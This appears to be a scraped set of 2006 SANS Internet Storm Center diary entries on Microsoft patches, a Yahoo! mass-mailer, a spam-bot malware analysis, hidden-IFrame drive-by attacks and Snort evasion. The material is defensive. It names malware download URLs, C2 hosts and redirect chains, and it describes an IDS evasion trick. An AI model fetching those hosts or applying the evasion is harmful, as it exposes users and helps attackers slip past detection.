John Bambenek -- University of Illinois
0 Comments
MS06-023: Microsoft's JScript remote code execution
A problem in JScript where it releases memory too soon can cause memory corruption and lead to remoee code execution.
The attack vector is web based where visiting malicious contant is sufficint to exploit the browser. This is strongly linked with MS06-021 and Microsoft recommends to install both at the same time.
Obviously it's better not to log in with administrative rights as it makes the impact of these vulnerabilities a lot worse.
--
Swa Frantzen -- section 66
0 Comments
MS06-022: buffer overflow in ART image rendering library
ART is an image file format (yep, image formats are still popular reasearch topics for hackers it seems). The format is used by AOL.
The impact of this is that users logged in with administrative rights can be exploited with remote code execution.
Microsoft rates this vulnerability as critical.
The patch removes support for ART image files from MSIE, as such they will not be rendered any longer.
It's interesting to note that the image library is an optional install on windows 2000.
Workarounds:
- Do not login as administrator or with an account with administative rights, it's dangerous.
- Consider switching to an alternative browser, they work really well and it makes the lives of the hackers harder is not all of us use the same browser with the same vulnerabilities.
--
Swa Frantzen -- section 66
0 Comments
MS06-021: Internet Explorer patch
Fixes memory corruption that can lead to remote code execution, disclosure of sensitive information and creation of additional accounts on the host operating system.
Microsoft rates this patch as critical and considering an impact of remote code execution in the client system, for a browser we woould rate such a thing as very critical.
Microsoft claims the attack vector has to be web based, the use of it through outlook should not be possible.
Please note that this patch affects the issues in kb 917425 by terminating the compatibility period.
This includes a fix for publicly known bugs: CSS cross domain information disclosure (CVE-2005-4089) and address bar spoofing (CVE-2006-1626).
--
Swa Frantzen -- section 66
0 Comments
Javascript/AJAX/Worm Like Behavior
fixed the exploit in it's new beta client.
Software developers, and webmasters alike should take this as a warning, new exploits will be coming that will use javascript and Ajax-like behavior to spread. The current worm could be readily modified to spread across many systems that do not escape javascript when displaying data from a foreign source. Many web developers should reexamine their code, and make sure that display functions do not deliver potentially malicious code.
After testing several popular web applications, we have found that several are in fact vulnerable to the very same type of exploit. Good coding practices, verifying that users are coming from an authorized form and that they are not submitting malicious code can protect developers against this type of exploit.
We will be sending notice to affected software vendors that we have identified at this time, however we currently do not have plans to publish specific applications until new releases/patches are available.
0 Comments
Yahoo! mass-mailer
It was first reported to the ISC at 12:32 UTC and now appears to be circulating in two slightly different variants. Analysis by Lorna and myself shows that both variants are flawed therefore they spread very effectively but do not actually perform the intended action. The mass-mailer attempts to open a browser window to www.lastdata.com but a spelling mistake prevents this from working. The website appears to be dormant and rejecting accesses.
The release of a new version barely two hours after we started our analysis which partially fixes the first version indicates that the code is very much under development and you should assume that the remaining bugs will be rapidly ironed out.
To activate the mass-mailer it is sufficient to open the mail message without clicking on the attachment and it will scour your address list and send itself as an attachment (forwarded message) to everyone on it. It searches for both @yahoo.com and @yahoogroups.com e-mail addresses.
There is currently no trivial fix for Yahoo! mail as turning off Javascript on the browser will prevent you from reading your e-mail. For Yahoo! groups it is recommended that moderators/adminstrators turn off attachments for the time being to prevent this spreading further.
0 Comments
SANSFIRE: Internet Storm Center Training Event
SANSFIRE will run from July 5th-13th in Washington DC. (great oportunity to arrive on the 4th and watch the fireworks). For details, see the course overview and the SANS@Night schedule as well as the special event schedule.
0 Comments
Microsoft Upcoming Bulletins Release
1) Nine Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical.
Prior to the release of the bulletins, Microsoft encourages administrators to review the following articles and take appropriate steps for their environment:
• Microsoft Security Advisory 912945 (Non-Security Update for Internet Explorer)
• Microsoft Knowledge Base Article 912945 (Internet Explorer ActiveX update)
• Microsoft Knowledge Base Article 917425 (Internet Explorer ActiveX compatibility patch for Mshtml.dll)
• Information for Developers about Internet Explorer
Accordingly to Microsoft, users who apply the security update will receive the ActiveX update regardless of whether they have applied the compatibility patch.
2) One Microsoft Security Bulletin affecting Microsoft Exchange. The highest Maximum Severity rating for this is Important.
As the update will include the functionality change (Microsoft Knowledge Base Article 912918 - Users cannot send e-mail messages from a mobile device or from a shared mailbox in Exchange 2000 Server and in Exchange Server 2003), administrators are urged to review the Knowledge Base article prior to release and take steps appropriate for their environment.
3) Two Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical.
4) One non-security High-Priority Updates for Windows on Windows Update (WU) and Software Update Services (SUS).
5) Two non-security High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
6) An updated version of the Microsoft Windows Malicious Software Removal Tool.
0 Comments
MS06-015 will not provide patch for windows 98 and ME.
The suggested workaround is blocking incoming traffic to TCP port 139 on any unpatched systems. This should at best be a temporary step; unsupported operating systems are a greater liability than supported ones.
Many thanks to everyone that sent us a pointer to this story.
More details can be found at:
http://www.microsoft.com/technet/security/Bulletin/MS06-015.mspx
http://blogs.technet.com/msrc/archive/2006/06/09/434300.aspx
0 Comments
Ethereal becomes Wireshark
0 Comments
WinGate Update
Melvin wrote to let us know that an updated version (6.1.3) is now available from http://www.wingate.com/download.php.
Thanks, Melvin!
0 Comments
Numbers Spam Solved
0 Comments
phpBB 2.0.21
There are some minor security improvements in the code, check the announcement for more details. Most of the code changes apear to be more functionality oriented than security oriented.
Considering the level of attention phpBB gets from the bad guys out there, it's best not to hesitate for long and upgrade really soon.
--
Swa Frantzen - Section 66
0 Comments
WinGate HTTP proxy vulnerability, remote DoS & Code Execution
Information is available here;
ISS rates this High Risk
WinGate HTTP proxy buffer overflow
Secunia - WinGate WWW Proxy Server Buffer Overflow Vulnerability
I do not see patch information available at this time.
0 Comments
A malware jungle
Detection
We got an interesting piece of malware from one of our readers, Robert. Robert detected one of his systems trying to connect to port 25 on various servers around the world. As this immediately screams: spam bot, Robert decided to analyze the box further.He captured some packets (you know that we at ISC love to analyze network traffic) and found an interesting binary that he submitted to us for analysis
Analysis
55e30602f27fa4272c3bd2dd9d701224 extdrvr.exeReceived results for file: extdrvr.exe
==========================
Antivirus Version Last update Result
AntiVir 6.34.1.37 06.06.2006 no virus found
Authentium 4.93.8 06.06.2006 no virus found
Avast 4.7.844.0 06.06.2006 no virus found
AVG 386 06.06.2006 no virus found
BitDefender 7.2 06.06.2006 no virus found
CAT-QuickHeal 8.00 06.06.2006 no virus found
ClamAV devel-20060426 06.06.2006 no virus found
DrWeb 4.33 06.06.2006 no virus found
eTrust-InoculateIT 23.72.29 06.06.2006 no virus found
eTrust-Vet 12.6.2244 06.06.2006 no virus found
Ewido 3.5 06.06.2006 no virus found
Fortinet 2.77.0.0 06.06.2006 no virus found
F-Prot 3.16f 06.06.2006 no virus found
Ikarus 0.2.65.0 06.06.2006 no virus found
Kaspersky 4.0.2.24 06.06.2006 no virus found
McAfee 4778 06.06.2006 no virus found
Microsoft 1.1441 06.07.2006 no virus found
NOD32v2 1.1582 06.06.2006 no virus found
Norman 5.90.17 06.06.2006 no virus found
Panda 9.0.0.4 06.06.2006 Suspicious file
Sophos 4.05.0 06.06.2006 no virus found
Symantec 8.0 06.06.2006 no virus found
TheHacker 5.9.8.155 06.05.2006 no virus found
UNA 1.83 06.06.2006 no virus found
VBA32 3.11.0 06.06.2006 no virus found
After we analyzed this binary, we discovered a malware jungle. So, this is what's happening:
extdrvr.exe is a spam bot that Robert detected. This malware is particularly nasty as, at the moment when we were writing this diary, just one of the 26 anti-virus programs on VirusTotal finding it suspicious.
When executed, the spam bot connects to spm.freecj.com and asks for the list of e-mail addresses to send spam to, together with the e-mail body. Immediately after this is downloaded, it will try sending the spam.
But that's not all. The malware also downloads other Trojan downloaders which, in turn, download other stuff.
First downloader that the main spam bot downloads is http://69.31.46.144/[REMOVED]/d1.html. This downloader will in turn download a pretty nasty dialer (so, making money *is* behind all this), from a well known malware network (that some of you probably already filtered): http://85.255.114.166/[REMOVED].exe.
The dialer will make itself persistent across reboots and will make services RasMan and TapiSrv automatically start at boot.
The dialer will also get the number it should call from http://216.80.7.64/[REMOVED]/getnumtemp.asp?nip=0.
0815205b98f2449de6db9b89cfae6f24 d1.html
3a62b9180ae98b9ad32980d0fbe1aa72 [REMOVED].exe
If this wasn't enough, prepare for more. The dialer will now download another downloader (are we getting lost in all this?), http://207.226.177.110/[REMOVED]. We're not completely sure what this downloader does, as it will download about 14kb of data from various sites, but this data seems to be encrypted. When we get more information about this, we'll update the diary.
1083e1401bc49ff8c167e912a3555c20 [REMOVED]
Back to the spam bot. What's interesting is that it will download and replace the machine's hosts file. Big deal, we've seen that a million times. Among all the standard AV vendors' web sites, and Microsoft Windows Update, the newly downloaded hosts file prevents user from visiting about 50 .biz sites, well known for spreading malware (for example, www.iframebiz.biz, www.toolbarbiz.biz, etc.). Trying to eliminate the competition here?
Lessons?
As always learning lessons is the most important part of handling incidents. Anti-virus doesn't do much for you when the malware is not detected obviously. So we should learn not to place all our trust in that channel for detecting malware. Robert detected this piece of malware through an IDS and correlation of logs. Monitoring your outgoing traffic, even in the absense of an IDS could do this trick. Looking for spikes in outgoing email is a good way to detect unexpected spam bots such as these. The blocking of the traditional sites using a hosts file is also a good thing to build monitoring for. If it gets used you know there's something going on and a second look wil be well spent effort.
Removal? Well once you deal with dozens of pieces of malware embedding itself left and right your luck in getting it off painlessly ran out.
Finding all that went wrong is very hard as you might be looking at malware being pulled in that changes in between the machine got it and you go and get it again, potentially changing (thus invalidating) much of the results.
Proactively keeping all systems up to date is good and helps, but making sure the really secret stuff cannot reside or even be consulted from a machine connected somehow to the Internet is a good step as well. A good place to build this is in a data classification (actually handling) policy. Define the most critical information assets and isolate them.
At this point we have not identified the intial infection vector yet.
--
Bojan Zdrnja
Swa Frantzen
0 Comments
GD DoS
Details about a vulnerability (and exploit) have been released on full disclosure that claim to cause the library to run an infinite loop while decoding crafted images. It's clear that when used this will lead to severely degraded performance of webservers.
No patch available so far, monitor http://www.boutell.com/gd/ if you use it in a vulnerable fashion.
Thanks Jim!
--
Swa Frantzen - Section 66
0 Comments
javascript file upload entry
While this attack needs more to become a bit effective (like making the user type the needed letters), it does show the dangers of running javascript once again. Your best choice if you use e.g. FireFox is to use something like Noscript. It allows you to turn javascript off by default and turn it on as needed for selected sites (those where the webmaster doesn't care for users not wanting to expose themselves to randomly downloaded executable content)
Aparently both Firefox and MSIE suffer from this.
--
Swa Frantzen - Section66
0 Comments
Spamassassin - upgrade
Spamassassin has 2 new releases out. They fix vulnerabilities that -given specific command line options- opens up spamassassin to remote command execution as the user spamassassin is running as.
Solution: upgrade to version 3.06 or 3.1.3 as soon as possible or do not use the vulnerable command line combination (aparently both "--vpopmail" and "-P" (paranoid) need to be turned on) as a workaround.
Thanks to fellow handlers Jim and Patrick.
If you do take the time to upgrade, I'd suggest to make sure you run it as a user that has hardly any rights and/or chroot it.
--
Swa Frantzen - Section 66
0 Comments
Spam - spam - spam
Users report receiving messages apearing to originate from themselves, with only numbers as subject and body.
The body does apears to be HTML encoded, but it's so basic as to not pose a threat so far.
It would be a good idea to investigate if you can drop email that apears to be from your own organization while originating outside of it. If your users do not send such email (e.g. because they use a VPN to connect back to the inside while on the road), dropping that email might cut down on a few spams.
Some fun while on this subject - it's a Tuesday after a 3 day weekend in some countries - :
All relations to the SPAM luncheon meat product are purely accidental, even if it was inspired on a 1975 sketch from Monty Python. Most of us think spam started back in 1994 when two lawyers advertized their green card scam in each and every usenet newsgroup. Some digging around revealed much earlier attempts in 1978 on the precursor to the modern Internet. It just goes to show you're never around for too long to learn something new.
--
Swa Frantzen - Section 66
0 Comments
Farewell 6Bone
-------------------------
Jim Clausing, jclausing at isc dot sans dot org
0 Comments
Snort URL evasion vulnerability patched and version 2.6.0 available
Late breaking news flash! Snort 2.6.0 is out. According to Jennifer Steffens of Sourcefire, the new release includes:
- Tcp stream properly reassembled after failed sequence check, which may lead to possible detection evasion.
- Added configurable stream flushpoints.
- Improved rpc processing.
- Improved portscan detection.
- Improved http request processing and handling of possible evasion cases.
- Improved performance monitoring.
0 Comments
Windows Alternate Data Streams Revisited
The Bugtraq posting http://www.securityfocus.com/archive/1/435962/30/0/threaded mentions a few antivirus tools that fail to detect known malware when stored as ADSs. The Internet Storm Center has not tested any of these claims, but we have no reason to dispute them as we have seen this time and time again.
Ryan Means wrote an excellent paper (GCFW honors) that discusses Alternate Data Streams in depth, presents a number of tools to locate and manipulate ADSs, and presents an extension to Windows Explorer to directly report the presence of ADSs. You can pull it from the SANS Reading Room at: http://www.sans.org/rr/whitepapers/honors/1503.php
0 Comments
Hidden IFrame Remains Popular With Browse-By Exploit Authors
The remote server's index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer. The executable was recognized by about half of anti-virus tools as a spyware trojan, and was assigned names such as Downloader-ASQ, TR/Spy.Small.EE.2, Win32/SillyDL.2fy, Trojan.Spy.Win32.Small, and Downloader.
The exploit itself targeted a vulnerability that was patched in the update to Internet Explorer that Microsoft released on April 11, 2006. Microsoft Security Bulletin MS06-014 briefly describes the problem:
A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Cumulative Security Update for Internet Explorer (912812), which was also released on April 11th, according to Microsoft Security Bulletin MS06-013, strengthens security settings for the Internet zone on Internet Explorer. These settings render the exploit ineffective even if the potential victim did not apply the 911562 patch referenced above. The cumulative update sets the following settings to Disable:
- Initialize and script ActiveX controls not marked as safe for scripting
- Access data sources across domains
Hidden IFrame elements continue to be a popular way for targeting website visitors. After breaking into a server, the attacker modifies its HTML code, using a hidden IFrame tag to retrieve exploit code from another system. Maintainers of the compromised website typically don't know that they are infecting their visitors for quite some time.
Lenny Zeltser
ISC Handler on Duty
www.zeltser.com
0 Comments
Non-standard Incident Prediction
For example, consider what we witnessed last year following the Katrina and Rita hurricanes that struck the southern coast of the USA. Within 24 hours of landfall, the Internet Storm Center observed a dramatic increase in fraudulent web sites aimed at good-hearted people wanting to donate to charities or relief efforts. We can predict with fairly high certainty that the same thing is going to happen again this year. We are monitoring DNS registrations and have seen several new names appear in the last few weeks with the strings "alberto", "beryl", "donation", or "hurricane" in them. (Alberto and Beryl are the first two names on the list for 2006.) Are they all legitimate? Well, let's see what happens as soon as the first storm forms and makes landfall.
In fact, one of our observant readers (thanks, George!) wrote us to say, "I work in a government research lab with a very diverse user population, including many soccer fans. The last World Cup led to a malware spike. I expect another spike this year, but with a potential for more sophisticated attacks." So George is keeping an eye out for a potential rise in malware attacks, basing his prediction on the fact that during the World Cup many fraudsters and pranksters will likely launch specially crafted emails and set up bogus web sites designed to lure in sports fans around the world.
It's important to recognize that a large percentage of today's Internet attacks are oriented on fraud and criminal activity, and that the criminals will use any event or circumstance to "hack layer eight" as I like to say when I teach SANS Security Essentials. (Layer eight is the "carbon layer" that sits on top of layer seven, application.)
So what are you doing to protect your layer eight from future incidents? Do you have early warning and detection devices in place? Are you educating your users and arming them to defend themselves and your networks against con-jobs aimed directly at them? Do you have not just good, but GREAT, organizational policy in place? Remember, the first step in incident handling is Preparation, and the time to start preparing is now.
Marcus H. Sachs
Director, SANS Internet Storm Center
0 Comments
News From Microsoft
Thanks, David, for bringing this to our attention.
0 Comments
Firefox and Thunderbird 1.5.0.4 released
---------------------------
Jim Clausing, jac --at-- isc dot sans dot org
0 Comments
Something new on Telnet?
Checking on Dshield ,something is odd there too...
My question is, are you observing something different on your IDS/FW logs on this port?
-----------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno && isc. sans. org)
0 Comments
Invision Board being exploited
Now, when you visit it, it will try to push a .wmf exploit to you.
PLEASE, DO NOT CLICK ON THE FOLLOWING LINKS!
The iframes on that page were reditecting to HTTP : // traffweb1.biz/dl/adv771.php and HTTP : // 2-extreme.biz/traff.php?adv=54 .
Those websites, were redirecting to HTTP : // 85.255.116.234/11.htm and HTTP : // 85.255.116.234/25.htm .
Which would try to push the .WMF exploit to you...
Fortunately, all AV vendors at Virustotal recognize the exploit, and at least McAfee and Symantec will trigger an alert when you are visiting this forum page.
---------------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno /&&/ isc. sans. org )
0 Comments
F-Secure web console buffer overflow
Patch availability:
Product | Versions | Hotfix ID | Download |
F-Secure Anti-Virus for Microsoft Exchange | 6.40 | Apply hotfix for F-Secure Anti-Virus for Microsoft Exchange 6.40: ftp://ftp.f-secure.com/support/hotfix/fsav-mse/fsavmse640-05.zip | |
F-Secure Internet Gatekeeper | 6.50 | Upgrade to F-Secure Internet Gatekeeper 6.60 or Apply hotfix for the F-Secure Internet Gatekeeper 6.50: ftp://ftp.f-secure.com/support/hotfix/fsig/fsigk650-01.zip | |
F-Secure Internet Gatekeeper | 6.42, 6.41, 6.40 | Upgrade to F-Secure Internet Gatekeeper 6.60 |
---------------------------------
Jim Clausing, jclausing /at\ isc dot sans dot org
0 Comments
Snort bypass vulnerability
http://www.snort.org/pub-bin/snortnews.cgi#431
Demarc just released a vulnerability alert on Snort. The vulnerability leads to evasion of URI content rules. When a carriage return is added to the end of a URL (before HTTP protocol declaration), Snort detection can be evaded. According to the alert, this vulnerability will affect thousands of detection rules in the standard rule base. No need to panic at the moment though, as the folks at Sourcefire have fixed this in version 2.6.0 and we haven't seen this kind of traffic in the wild yet. Thanks to Blake Hartstein for reporting this to us. Also, thanks to our friends at Sourcefire for info on the extent of the problem and about the upcoming patch.
Please refer to the vulnerability alert for more details,
http://www.demarc.com/support/downloads/patch_20060531
0 Comments
More on Symantec vulnerabilities
*ALL* versions of 10.0.x and 10.1.x of Symantec Antivirus Corporate Edition and 3.0.x and 3.1.x of Symantec Client Security seem to be vulnerable.
Symantec Antivirus Corporate Edition version 8.x and 9.x seem to be ok.
Symantec released 4 patches for each product (http://www.symantec.com/avcenter/security/Content/2006.05.25.html):
Symantec Antivirus Corporate Edition
10.1.0.394 -> 10.1.0.396 (there's a typo here on their web, it's not version 3)
10.1.0.400 -> 10.1.0.401
10.0.2.2010 -> 10.0.2.2011
10.0.2.2020 -> 10.0.2.2021
Symantec Client Security
3.1.0.394 -> 3.1.0.396
3.1.0.400 -> 3.1.0.401
3.0.2.2010 -> 3.0.2.2011
3.0.2.2020 -> 3.0.2.2021
Now, if you are running *ANY* other version that is affected, you will have to first upgrade to one of the versions that have the patch out and then install the patch. I hope this will clear the confusion.
There seem to be some mitigations to the problem though. As eEye stated, this is a remotely exploitable vulnerability. Symantec Antivirus Corporate Edition, when in managed mode, will have the service Rtvscan.exe listening on TCP port 2967. In case that your host based firewall is configured to block access to this port (effectively meaning that you can't manage the client from the centralized server, at least not until the client connects to it) you should be ok.
On our test machine, the unmanaged installation of Symantec Antivirus Corporate Edition didn't have any listeners so it looks like it's safe, at least from a remote exploit over the network (patch in any case!).
If we get more information we'll update the diary. Thanks to Gary for help with this.
UPDATE
Symantec finally posted a nice web page with details what you have to do regarding the version you're running at http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2006052609181248.
0 Comments
0 Comments